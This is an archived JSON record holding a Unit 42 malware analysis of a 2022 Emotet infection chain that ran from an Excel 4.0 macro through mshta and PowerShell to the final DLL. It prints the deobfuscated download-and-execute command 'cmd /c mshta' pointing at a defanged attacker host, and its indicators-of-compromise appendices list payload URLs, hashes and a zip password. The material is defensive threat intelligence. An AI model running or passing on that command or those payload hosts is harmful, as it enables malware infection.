{
	"id": "52ea5dd0-b820-4474-bfe7-8b7faa9a2f10",
	"created_at": "2026-04-06T00:09:50.471888Z",
	"updated_at": "2026-04-10T03:20:23.208347Z",
	"deleted_at": null,
	"sha1_hash": "75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d",
	"title": "New Emotet Infection Method",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1201791,
	"plain_text": "New Emotet Infection Method\r\nBy Saqib Khanzada, Tyler Halfpop, Micah Yates, Brad Duncan\r\nPublished: 2022-02-15 · Archived: 2026-04-05 12:46:16 UTC\r\nExecutive Summary\r\nAs early as Dec. 21, 2021, Unit 42 observed a new infection method for the highly prevalent malware family\r\nEmotet. Emotet is high-volume malware that often changes and modifies its attack patterns. This latest\r\nmodification of the Emotet attack follows suit.\r\nThe new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro.\r\nWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of\r\nPowerShell to retrieve and execute the final Emotet payload.\r\nPalo Alto Networks customers are protected from Emotet and similar malware families using similar obfuscation\r\ntechniques with Cortex XDR or the Next-Generation Firewall with the WildFire and Threat Prevention security\r\nsubscriptions.\r\nHistory of Emotet\r\nEmotet was first discovered as a banking trojan in 2014, and it has been very active in recent years. In January\r\n2021, law enforcement and judicial agencies took down the Emotet botnet infrastructure, but Emotet returned in\r\nNovember 2021 and has remained active since then.\r\nEmotet frequently uses thread hijacking as part of its attack method. As described in our previous blog on\r\nEmotet’s thread hijacking, this technique generates fake replies based on legitimate emails stolen from mail clients\r\nof Windows hosts previously infected with Emotet. The botnet uses this stolen email data to create fake replies\r\nimpersonating the original senders.\r\nUsing thread hijacking and other types of emails, Emotet has implemented different infection methods since its\r\nreturn. Most notable were emails with links to install a fake Adobe Windows App Installer Package in December\r\n2021. After a holiday break, Emotet returned to attachment-based emails in January 2022. 
As early as Dec. 21,\r\n2021, Emotet started using a new infection method, which we describe in this blog.\r\nIn some cases, Emotet uses a password-protected zip archive as an attachment to its email. In other cases, Emotet\r\nuses an Excel spreadsheet directly attached to the email.\r\nExample of an Initial Email Lure\r\nShown in Figure 1, this example of an initial email lure sent by Emotet is a recent example of Emotet’s thread\r\nhijacking. The stolen email thread is from June 2021, and this email was sent by the Emotet botnet on Jan. 27,\r\nhttps://unit42.paloaltonetworks.com/new-emotet-infection-method/\r\nPage 1 of 7\n\n2022. This example contains an encrypted zip file in an attempt to bypass security systems. The password to the\r\nzip file is included in the email, so that the victim can extract the contents.\r\nFigure 1. Example of a thread-hijacked Emotet email lure sent on Jan. 27, 2022.\r\nExcel Document\r\nThe encrypted zip file contains a single Excel document with Excel 4.0 macros. These macros are an old Excel\r\nfeature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows\r\nhost before the malicious content is activated.\r\nFigure 2. Excel 4.0 macro document.\r\nWhen the macro code is enabled, it executes cmd.exe to run mshta.exe with an argument to retrieve and execute a\r\nremote HTML application. The code utilizes hex and character obfuscation in order to attempt to bypass static\r\ndetection measures. The deobfuscated command string that is executed is: cmd /c mshta\r\nhxxp://91.240.118[.]168/se/s.html\r\nFigure 3. Excel 4.0 macro code that executes cmd and mshta.\r\nThe HTML application shown in Figure 4 is highly obfuscated. It will download and execute additional\r\nPowerShell code.\r\nFigure 4. 
Obfuscated HTML application.\r\nPowerShell\r\nThe initial obfuscated PowerShell script shown in Figure 5 connects to hxxp://91.240.118[.]168/se/s.png. This\r\nURL returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\r\nFigure 5. Initial PowerShell downloader.\r\nThis second-stage PowerShell code shown in Figure 6 contains 14 URLs to retrieve the Emotet binary. The script\r\nattempts each URL until an Emotet binary is successfully downloaded. Having multiple URLs makes this attack\r\nmore resilient in the event that one of the URLs is taken down.\r\nFigure 6. HTTP traffic showing the second-stage PowerShell code.\r\nThe Emotet DLL loads an encrypted PE from its resource section as the final stage of this attack chain.\r\nFigure 7. Emotet DLL with an encrypted PE from its resource section.\r\nConclusion\r\nEmotet is a highly-active malware family that frequently changes its infection techniques. These changes are\r\nlikely an attempt to avoid detection. Emotet’s new attack chain reveals multiple stages with different file types and\r\nobfuscated script before arriving at the final Emotet payload.\r\nPalo Alto Networks customers are protected from malware families using similar obfuscation techniques with\r\nCortex XDR or the Next-Generation Firewall with WildFire and Threat Prevention security subscriptions.\r\nIndicators of Compromise\r\nAppendix A: Files From Emotet Email Lure on Jan. 27, 2022\r\nSHA256 hash: 9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9\r\nFile size: 40,929 bytes\r\nFile name: form.zip\r\nFile description: Password-protected encrypted zip archive seen on Jan. 
27, 2022\r\nPassword: EHGWQARLC\r\nSHA256 hash: 6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88\r\nFile size: 77,989 bytes\r\nFile name: form.xlsm\r\nFile description: Excel file with Excel 4.0 macros extracted from the above zip archive\r\nAppendix B: PowerShell Script Seen on Jan. 27, 2022\r\nSHA256 hash: 9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1\r\nFile size: 10,986 bytes\r\nFile location: hxxp://91.240.118[.]168/se/s.html\r\nFile description: First-stage PowerShell script\r\nSHA256 hash: 5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed\r\nFile size: 1,353 bytes\r\nFile location: hxxp://91.240.118[.]168/se/s.png\r\nFile description: Second-stage PowerShell script\r\nAppendix C: URLs Hosting the Emotet DLL on Jan. 27, 2022\r\nhxxp://unifiedpharma[.]com/wp-content/5arxM/\r\nhxxp://hotelamerpalace[.]com/Fox-C404/LEPqPJpt4Gbr8BHAn/\r\nhxxps://connecticutsfinestmovers[.]com/Fox-C/mVwOqxT17gVWaE8E/\r\nhxxp://icfacn[.]com/runtime/n7qA2YStudp/\r\nhxxps://krezol-group[.]com:443/images/PmLGLKYeCBs5d/\r\nhxxp://ledcaopingdeng[.]com/wp-includes/Qq39yj7fpvk/\r\nhxxp://autodiscover.karlamejia[.]com/wp-admin/hcdnVlRIiwvTVrJjJEE/\r\nhxxps://crmweb[.]info:443/bitrix/rc9XjtwF/\r\nhxxp://accessunited-bank[.]com/admin/hzIgVwq8btak/\r\nhxxp://pigij[.]com/wp-admin/MVW5/\r\nhxxp://artanddesign[.]one/wp-content/uploads/A2cZL7/\r\nhxxp://strawberry.kids-singer[.]net/assets_c/WAdvNT84Dmu/\r\nhxxps://eleccom[.]shop:443/services/AEjSDj/\r\nhxxps://izocab[.]com/nashi-klienty/B5SC/\r\nAppendix D: Example of Emotet DLL on Jan. 
27, 2022\r\nSHA256 hash: 2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f\r\nFile size: 516,096 bytes\r\nFile location: hxxp://unifiedpharma[.]com/wp-content/5arxM/\r\nFile location: C:\\Users\\Public\\Documents\\ssd.dll\r\nFile location: C:\\Users\\[username]\\AppData\\Local\\[random characters]\\[random characters].[random characters]\r\nRun method: rundll32.exe [filename],[any string]\r\nUpdated Feb. 15, 2022, to list earlier dates of initial observation of the infection method.\r\nSource: https://unit42.paloaltonetworks.com/new-emotet-infection-method/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-emotet-infection-method/"
	],
	"report_names": [
		"new-emotet-infection-method"
	],
	"threat_actors": [],
	"ts_created_at": 1775434190,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d.pdf",
		"text": "https://archive.orkl.eu/75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d.txt",
		"img": "https://archive.orkl.eu/75b4843ad3c32cf7b3f20792e88645bb2e1bdf9d.jpg"
	}
}